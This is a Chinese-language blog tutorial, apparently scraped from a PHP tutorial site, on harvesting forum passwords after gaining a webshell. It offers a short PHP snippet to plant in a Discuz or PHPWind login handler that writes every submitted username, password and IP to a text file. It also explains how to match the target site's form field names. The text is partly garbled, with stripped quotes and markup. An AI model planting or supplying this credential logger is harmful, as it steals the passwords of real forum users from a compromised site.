拿到webshell之後,想要進一步滲透,諸如discuz的密碼,不是直接用md5加密的,破解難度很大。以前幫大頭寫過一次,昨天小豬大哥正好用到,就又寫了一遍。代碼比較簡單,就幾句話,我把原理說的詳細點,照顧下對php不太瞭解有朋友。 if($_POST[loginsubmit]!=){ //判斷是否點了登陸按鈕$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來賦值給變數$sb fwrite(fopen(robot.txt,ab),$sb);} //結果寫入一個檔案 下面簡單分析一下,以華夏的登陸頁面為例。開啟bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜尋action找到登陸的表單。 我只複製了關鍵代碼過來. //action後面的值即是表單提交的地址,裡面會處理登陸,比如判斷密碼是不是正確什麼的 method為POST,所以用$_POST接收。 。。。。強大的省略符號。。。。。。 帳號(
U):
//使用者名稱的input輸入框, 注意其name的值, 要和$_POST[username] 這裡面的對應, 所以要截取華夏的密碼,需要改為 $_POST[pwuser] 密 碼(
P):
//使用者名稱的input輸入框, 注意其name的值, 要和$_POST[username] 這裡面的對應, 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]
http://www.bkjia.com/PHPjc/478807.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/478807.htmlTechArticle拿到webshell之後,想要進一步滲透,諸如discuz的密碼,不是直接用md5加密的,破解難度很大。以前幫大頭寫過一次,昨天小豬大哥正好用到,...
